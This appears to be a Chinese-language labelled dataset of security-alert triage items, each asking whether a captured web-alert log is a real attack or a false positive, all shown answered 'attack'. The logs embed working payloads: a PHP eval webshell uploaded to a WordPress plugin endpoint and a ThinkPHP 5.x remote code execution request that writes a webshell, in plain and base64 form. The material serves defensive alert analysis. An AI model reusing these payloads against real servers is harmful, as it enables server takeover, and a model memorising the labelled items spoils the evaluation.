你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673531", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732673531, "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 109, "uri": "/wp-json/mwai-ui/v1/files/upload", "dport": 80, "vuln_name": "发现脚本文件上传行为", "rsp_status": 0, "code_language": "通用", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": 89, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "public_date": "2018-08-20 18:32:27", "sport": 53686}, "content-disposition": "form-data; filename=\"test.txt\"", "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "file_md5": "", "rule_key": "webids", "connection": "close", "api": "www.hn.sgcc.cn/wp-json/mwai-ui/v1/files/upload", "first_access_time": "2024-11-27 10:12:11", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现脚本文件上传行为", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "00a9b2a8ad023d6ebf71c5bb98700a5d", "xff": "", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "attack_chain": "0x02010000", "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673510", "code_language": "通用", "public_date": "2018-08-20 18:32:27", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "109", "h_proto_version": "HTTP/1.1", "uri": "/wp-json/mwai-ui/v1/files/upload", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055e", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1", "referer": "http://^url^/wp-json/mwai-ui/v1/files/upload", "vlan_id": "", "vuln_type": "发现脚本文件上传行为", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": "89", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvd3AtanNvbi9td2FpLXVpL3YxL2ZpbGVzL3VwbG9hZCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2JnaGJnZXJ1Z3k4N2dlcmJ1eQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NClJlZmVyZXI6IGh0dHA6Ly9edXJsXi93cC1qc29uL213YWktdWkvdjEvZmlsZXMvdXBsb2FkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBVOyBJbnRlbCBNYWMgT1MgWCAxMF82XzQ7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMSAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS82LjAuNDE0LjAgU2FmYXJpLzUzNC4xDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IGZpbGVuYW1lPSJ0ZXN0LnR4dCINCkNvbnRlbnQtTGVuZ3RoOiAzNDkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQoNCg==", "req_body": "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS03YmdoYmdlcnVneTg3Z2VyYnV5DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iZXZlLnBocCINCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbg0KDQo8P3BocCBjbGFzcyBDdXN0b21FeGVjdXRvciB7ICBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJGNvZGUpeyAgQGV2YWwoIi8qQ3VzdG9tQ29kZUV4ZWN1dG9yKi8iIC4gJGNvZGUpOyAgfSB9ICBuZXcgQ3VzdG9tRXhlY3V0b3IoJF9SRVFVRVNUWydNJ10pOyA/PnNlcnRqZTV0DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTdiZ2hiZ2VydWd5ODdnZXJidXktLQ==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_575aff7cce0f63de4840e839fc8e224a", "access_time": "2024-11-27 10:12:11", "content-length": "349", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "multipart/form-data; boundary=------------------------7bghbgerugy87gerbuy", "sip": "45.64.52.160", "dimension": "3", "url_path": "/wp-json/mwai-ui/v1/files/upload", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=------------------------7bghbgerugy87gerbuy\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://^url^/wp-json/mwai-ui/v1/files/upload\r\nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1\r\nContent-Disposition: form-data; filename=\"test.txt\"\r\nContent-Length: 349\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "--------------------------7bghbgerugy87gerbuy\r\nContent-Disposition: form-data; name=\"file\"; filename=\"eve.php\"\r\nContent-Type: text/plain\r\n\r\n<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['M']); ?>sertje5t\r\n--------------------------7bghbgerugy87gerbuy--", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567902-发现脚本文件上传行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.6\", \"software\": \"Chrome/6.0.414\", \"hw_type\": \"PC\"}}", "sport": "53686", "h_url": "/wp-json/mwai-ui/v1/files/upload"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673479", "referer": "http://www.hn.sgcc.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['50']); ?>xinghuoxise$", "vlan_id": "", "vuln_type": "PHP代码执行攻击", "rule_version_str": "3.0.1122.14572", "attack_type": "代码执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "代码执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732673479, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 814, "uri": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "dport": 80, "vuln_name": "PHP代码执行攻击", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 794, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "45.64.52.160", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2018-09-13 16:03:57", "sport": 54284}, "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "794", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/cz0vaW5kZXgvJTVDdGhpbmslNUNhcHAvaW52b2tlZnVuY3Rpb24mZnVuY3Rpb249Y2FsbF91c2VyX2Z1bmNfYXJyYXkmdmFyc1swXT1maWxlX3B1dF9jb250ZW50cyZ2YXJzWzFdW109d3JwYW8ucGhwJnZhcnNbMV1bXT08P3BocCUyMGNsYXNzJTIwQ3VzdG9tRXhlY3V0b3IlMjB7JTIwJTIwcHVibGljJTIwZnVuY3Rpb24lMjBfX2NvbnN0cnVjdCgkY29kZSl7JTIwJTIwQGV2YWwoIi8qQ3VzdG9tQ29kZUV4ZWN1dG9yKi8iJTIwLiUyMCRjb2RlKTslMjAlMjB9JTIwfSUyMCUyMG5ldyUyMEN1c3RvbUV4ZWN1dG9yKCRfUkVRVUVTVFsnNTAnXSk7JTIwPz54aW5naHVveGlzZSQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vd3d3LmhuLnNnY2MuY24vP3M9L2luZGV4LyU1Q3RoaW5rJTVDYXBwL2ludm9rZWZ1bmN0aW9uJmZ1bmN0aW9uPWNhbGxfdXNlcl9mdW5jX2FycmF5JnZhcnNbMF09ZmlsZV9wdXRfY29udGVudHMmdmFyc1sxXVtdPXdycGFvLnBocCZ2YXJzWzFdW109PD9waHAgY2xhc3MgQ3VzdG9tRXhlY3V0b3IgeyAgcHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRjb2RlKXsgIEBldmFsKCIvKkN1c3RvbUNvZGVFeGVjdXRvciovIiAuICRjb2RlKTsgIH0gfSAgbmV3IEN1c3RvbUV4ZWN1dG9yKCRfUkVRVUVTVFsnNTAnXSk7ID8+eGluZ2h1b3hpc2UkDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4xKQ0KSG9zdDogd3d3LmhuLnNnY2MuY24NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "api": "www.hn.sgcc.cn/", "cache-control": "no-cache", "first_access_time": "2024-11-27 10:11:19", "hazard_level": "8", "accept-language": "zh-cn", "hazard_rating": "危急", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "bd84d42bcb2fb9575488caf53593cdc9", "proto": "http", "xff": "", "alarm_id": "20241127_4790ef825027f287add98d0d938f4aed", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02010000", "access_time": "2024-11-27 10:11:19", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732673460", "code_language": "PHP", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "45.64.52.160", "public_date": "2018-09-13 16:03:57", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "814", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020593", "req_header": "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$ HTTP/1.1\r\nAccept: */*\r\nReferer: http://www.hn.sgcc.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['50']); ?>xinghuoxise$\r\nAccept-Language: zh-cn\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nHost: www.hn.sgcc.cn\r\nCache-Control: no-cache\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567955-PHP代码执行攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"IE/9.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "54284", "h_url": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673479", "referer": "http://www.hn.sgcc.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['50']); ?>xinghuoxise$", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "代码执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "代码执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732673479, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 0, "uri": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "dport": 80, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "45.64.52.160", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 54284}, "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/cz0vaW5kZXgvJTVDdGhpbmslNUNhcHAvaW52b2tlZnVuY3Rpb24mZnVuY3Rpb249Y2FsbF91c2VyX2Z1bmNfYXJyYXkmdmFyc1swXT1maWxlX3B1dF9jb250ZW50cyZ2YXJzWzFdW109d3JwYW8ucGhwJnZhcnNbMV1bXT08P3BocCUyMGNsYXNzJTIwQ3VzdG9tRXhlY3V0b3IlMjB7JTIwJTIwcHVibGljJTIwZnVuY3Rpb24lMjBfX2NvbnN0cnVjdCgkY29kZSl7JTIwJTIwQGV2YWwoIi8qQ3VzdG9tQ29kZUV4ZWN1dG9yKi8iJTIwLiUyMCRjb2RlKTslMjAlMjB9JTIwfSUyMCUyMG5ldyUyMEN1c3RvbUV4ZWN1dG9yKCRfUkVRVUVTVFsnNTAnXSk7JTIwPz54aW5naHVveGlzZSQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vd3d3LmhuLnNnY2MuY24vP3M9L2luZGV4LyU1Q3RoaW5rJTVDYXBwL2ludm9rZWZ1bmN0aW9uJmZ1bmN0aW9uPWNhbGxfdXNlcl9mdW5jX2FycmF5JnZhcnNbMF09ZmlsZV9wdXRfY29udGVudHMmdmFyc1sxXVtdPXdycGFvLnBocCZ2YXJzWzFdW109PD9waHAgY2xhc3MgQ3VzdG9tRXhlY3V0b3IgeyAgcHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRjb2RlKXsgIEBldmFsKCIvKkN1c3RvbUNvZGVFeGVjdXRvciovIiAuICRjb2RlKTsgIH0gfSAgbmV3IEN1c3RvbUV4ZWN1dG9yKCRfUkVRVUVTVFsnNTAnXSk7ID8+eGluZ2h1b3hpc2UkDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4xKQ0KSG9zdDogd3d3LmhuLnNnY2MuY24NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "api": "www.hn.sgcc.cn/", "cache-control": "no-cache", "first_access_time": "2024-11-27 10:11:19", "hazard_level": "6", "accept-language": "zh-cn", "hazard_rating": "高危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "6bcf11bf5b8af7f33daf847919529556", "proto": "http", "xff": "", "alarm_id": "20241127_7315c8d3e59d7592251691df7ed0718f", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "access_time": "2024-11-27 10:11:19", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732673460", "code_language": "PHP", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "45.64.52.160", "public_date": "2020-11-25 19:53:49", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b70", "req_header": "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$ HTTP/1.1\r\nAccept: */*\r\nReferer: http://www.hn.sgcc.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['50']); ?>xinghuoxise$\r\nAccept-Language: zh-cn\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nHost: www.hn.sgcc.cn\r\nCache-Control: no-cache\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "54284", "h_url": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673479", "referer": "http://www.hn.sgcc.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['50']); ?>xinghuoxise$", "vlan_id": "", "vuln_type": "ThinkPHP 5.x 远程代码执行", "rule_version_str": "3.0.1122.14572", "attack_type": "代码执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "代码执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732673479, "vuln_harm": "该更新修复了由于框架对于控制器名没有做到足够的检测,会导致在使用 Pathinfo 访问模式的情况下,造成可能的 GetShell", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "ThinkPHP", "hit_end": 49, "uri": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "dport": 80, "vuln_name": "ThinkPHP 5.x 远程代码执行", "rsp_status": 0, "code_language": "PHP", "solution": "官方推荐尽快更新到最新版本。", "hit_start": 29, "detail_info": "2018 年 12 月 9 日, ThinkPHP 官方发布针对 5.x 版本的重要更新,其中涉及一个安全更新.", "xff": "", "sip": "45.64.52.160", "vuln_desc": "2018 年 12 月 9 日, ThinkPHP 官方发布针对 5.x 版本的重要更新,其中涉及一个安全更新.", "public_date": "2018-12-11 18:26:31", "sport": 54284}, "solution": "官方推荐尽快更新到最新版本。", "hit_start": "29", 